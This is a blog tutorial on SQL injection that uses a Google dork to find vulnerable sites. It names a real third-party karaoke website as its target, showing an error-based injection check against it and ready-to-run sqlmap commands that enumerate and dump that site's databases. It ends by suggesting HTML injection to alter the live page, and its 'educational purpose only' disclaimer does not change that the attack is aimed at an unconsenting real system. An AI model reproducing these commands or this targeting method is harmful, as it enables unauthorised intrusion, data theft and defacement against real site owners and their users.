Hacking remote database using SQL injection

0 / 2902
Hackling remote database using SQL injection

What is SQL Injection

  SQL injection is a technique of injecting malicious SQL queries in query string of a website vulnerable to SQL injection. Using SQL injection, one can take over a vulnerable website by getting access to all data, deface a website, tamper existing website data and a lot more. SQL injection attacks are extremely dangerous and vulnerable websites are at high risk of leaking confidential data which might affect them as well as all it’s stake holders. In this blog, I will show you how to find out a website vulnerable to SQL injection and thereby exploit the vulnerability using a tool called SQLMap   We are going to use google dorks to find out a vulnerable website. If you don’t know what are google dorks, please read my previous blog here   Let’s use a simple google dork to find out vulnerable SQLi site as below:- inurl:index.php?id= The above will return a large number of search results all of which aren’t obviously vulnerable but certainly are a good candidate for SQL injection attacks if they do not sanitize the query string properly and thus execute the injected SQL query.   

Quick check to find SQL injection vulnerability

  Out of the search results , returned by the above google search, I spotted a website karaoke.co.nz, vulnerable to SQL injection. Visiting the URL, http://karaoke.co.nz/items/index.php?id=37 and then appending a single quote at the end of this URL, shows that it’s not able to sanitize query strings properly. Check this URL:- http://karaoke.co.nz/items/index.php?id=37′ which gives the below error:-   Unable to query local database to select IdentifierYou have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ”’ at line 1 select * from Category where Identifier = 37′   Below is a partial dump of one of the DB tables of this site:-     SQLMAP DUMP         To use SQLMap, download and install python first from here. Once done, download and install SQLMap from here Once installed , go to the location where sqlmap is installed and type the below command to get familiarized with SQLMap  
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
</span>
<span style="color: #000000;">sqlmap.py --helpIt will show the below results with various options provided by it</span>
<span style="color: #000000;">___</span>
<span style="color: #000000;">__H__</span>
<span style="color: #000000;">___ ___[.]_____ ___ ___  {1.1.3.11#dev}</span>
<span style="color: #000000;">|_ -| . [)]     | .'| . |</span>
<span style="color: #000000;">|___|_  [.]_|_|_|__,|  _|</span>
<span style="color: #000000;">|_|V          |_|   http://sqlmap.orgUsage: sqlmap.py [options]Options:</span>
<span style="color: #000000;">-h, --help            Show basic help message and exit</span>
<span style="color: #000000;">-hh                   Show advanced help message and exit</span>
<span style="color: #000000;">--version             Show program'
s version number and exit</span>
<span style="color: #000000;">-v VERBOSE            Verbosity level: 0-6 (default 1)Target:</span>
<span style="color: #000000;">At least one of these options has to be provided to define the</span>
<span style="color: #000000;">target(s)-u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")</span>
<span style="color: #000000;">-g GOOGLEDORK       Process Google dork results as target URLsRequest:</span>
<span style="color: #000000;">These options can be used to specify how to connect to the target URL--data=DATA         Data string to be sent through POST</span>
<span style="color: #000000;">--cookie=COOKIE     HTTP Cookie header value</span>
<span style="color: #000000;">--random-agent      Use randomly selected HTTP User-Agent header value</span>
<span style="color: #000000;">--proxy=PROXY       Use a proxy to connect to the target URL</span>
<span style="color: #000000;">--tor               Use Tor anonymity network</span>
<span style="color: #000000;">--check-tor         Check to see if Tor is used properlyInjection:</span>
<span style="color: #000000;">These options can be used to specify which parameters to test for,</span>
<span style="color: #000000;">provide custom injection payloads and optional tampering scripts-p TESTPARAMETER    Testable parameter(s)</span>
<span style="color: #000000;">--dbms=DBMS         Force back-end DBMS to this valueDetection:</span>
<span style="color: #000000;">These options can be used to customize the detection phase--level=LEVEL       Level of tests to perform (1-5, default 1)</span>
<span style="color: #000000;">--risk=RISK         Risk of tests to perform (1-3, default 1)Techniques:</span>
<span style="color: #000000;">These options can be used to tweak testing of specific SQL injection</span>
<span style="color: #000000;">techniques--technique=TECH    SQL injection techniques to use (default "BEUSTQ")Enumeration:</span>
<span style="color: #000000;">These options can be used to enumerate the back-end database</span>
<span style="color: #000000;">management system information, structure and data contained in the</span>
<span style="color: #000000;">tables. Moreover you can run your own SQL statements-a, --all           Retrieve everything</span>
<span style="color: #000000;">-b, --banner        Retrieve DBMS banner</span>
<span style="color: #000000;">--current-user      Retrieve DBMS current user</span>
<span style="color: #000000;">--current-db        Retrieve DBMS current database</span>
<span style="color: #000000;">--passwords         Enumerate DBMS users password hashes</span>
<span style="color: #000000;">--tables            Enumerate DBMS database tables</span>
<span style="color: #000000;">--columns           Enumerate DBMS database table columns</span>
<span style="color: #000000;">--schema            Enumerate DBMS schema</span>
<span style="color: #000000;">--dump              Dump DBMS database table entries</span>
<span style="color: #000000;">--dump-all          Dump all DBMS databases tables entries</span>
<span style="color: #000000;">-D DB               DBMS database to enumerate</span>
<span style="color: #000000;">-T TBL              DBMS database table(s) to enumerate</span>
<span style="color: #000000;">-C COL              DBMS database table column(s) to enumerateOperating system access:</span>
<span style="color: #000000;">These options can be used to access the back-end database management</span>
<span style="color: #000000;">system underlying operating system--os-shell          Prompt for an interactive operating system shell</span>
<span style="color: #000000;">--os-pwn            Prompt for an OOB shell, Meterpreter or VNCGeneral:</span>
<span style="color: #000000;">These options can be used to set some general working parameters--batch             Never ask for user input, use the default behaviour</span>
<span style="color: #000000;">--flush-session     Flush session files for current targetMiscellaneous:</span>
<span style="color: #000000;">--sqlmap-shell      Prompt for an interactive sqlmap shell</span>
<span style="color: #000000;">--wizard            Simple wizard interface for beginner users
   
Use the below SQLMap commands to dump all the databases of the vulnerable site
python d:\sqlmap\sqlmap.py  -u www.karaoke.co.nz/items/index.php?id=37 -D database –cookie=”security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee” –dbs
The above will return database names. claireg_karaoke and information_schema in this case.
Use the below commands to get list of tables and other diagnostic data out of those databases.
       
Once we have table names, let’s get the column names using below commands:-
python d:\sqlmap\sqlmap.py  -u www.karaoke.co.nz/items/index.php?id=37 -D claireg_karaoke –tables -T –columns  “*” –cookie=”security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee” –dbs  python d:\sqlmap\sqlmap.py  -u www.karaoke.co.nz/items/index.php?id=37 -D information_schema –tables -T –columns  “*” –cookie=”security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee” –dbsThe above commands “sqlmap-4” & “sqlmap-5” will return columns of the table specified by <table name>. Once we have all the info dumped, we can use it in whatever way we need. Once you have the column names, you can dump their values using the below commands   python d:\sqlmap\sqlmap.py -u www.karaoke.co.nz/items/index.php?id=37 -D information_schema -T PLUGINS –columns –cookie=”security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee” -C LOAD_OPTION, PLUGIN_AUTH_VERSION, PLUGIN_AUTHOR, PLUGIN_DESCRIPTION, PLUGIN_LIBRARY, PLUGIN_LIBRARY_VERSION, PLUGIN_LICENSE, PLUGIN_MATURITY, PLUGIN_NAME, PLUGIN_STATUS, PLUGIN_TYPE, PLUGIN_TYPE_VERSION, PLUGIN_VERSION –dumpIt’s also possible to dump the entire database using the option –dump-all 
The above commands “sqlmap-4” & “sqlmap-5” will return columns of the table specified by <table name>. Once we have all the info dumped, we can use it in whatever way we need.
Once you have the column names, you can dump their values using the below commands
   
It’s also possible to dump the entire database using the option –dump-all    
What more can be done to exploit this vulnerability ? Let’s try to manipulate the query string and change the html webpage
 
Since, the website is not able to sanitize the query string, we can insert an image in the HTML page by tampering the query string. The below link shows the exploit
 
HTML injection
 
 Happy hacking !!
 
Disclaimer:- The content is for educational purpose only. Any unethical usage of the info on this website is not my responsibility.
 
Like us at GolibraryIndia to get regular updates.  
 

Comments

comments


An avid reader, responsible for generating creative content ideas for golibrary.co. His interests include algorithms and programming languages. Blogging is a hobby and passion.

Related Posts